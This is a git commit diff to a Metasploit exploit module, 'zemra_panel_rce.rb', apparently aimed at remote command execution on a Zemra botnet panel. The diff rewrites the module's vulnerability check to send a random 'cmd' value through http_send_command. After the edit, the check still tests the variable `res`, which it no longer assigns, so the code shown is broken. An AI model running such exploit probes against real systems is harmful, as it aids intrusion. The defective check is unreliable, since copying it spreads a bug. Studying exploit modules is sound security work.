Update zemra_panel_rce.rb
called http_send_command right away :)
This commit is contained in:
parent
66560d5339
commit
5c5f3a4e7f
|
@ -59,15 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def check
|
def check
|
||||||
txt = Rex::Text.rand_text_alpha(8)
|
txt = Rex::Text.rand_text_alpha(8)
|
||||||
uri = normalize_uri(target_uri.path.to_s)
|
http_send_command(txt)
|
||||||
res = send_request_cgi({
|
|
||||||
'method' => 'GET',
|
|
||||||
'uri' => uri,
|
|
||||||
'vars_get' =>
|
|
||||||
{
|
|
||||||
'cmd' => txt
|
|
||||||
}
|
|
||||||
})
|
|
||||||
if res && res.body =~ /cmd/
|
if res && res.body =~ /cmd/
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue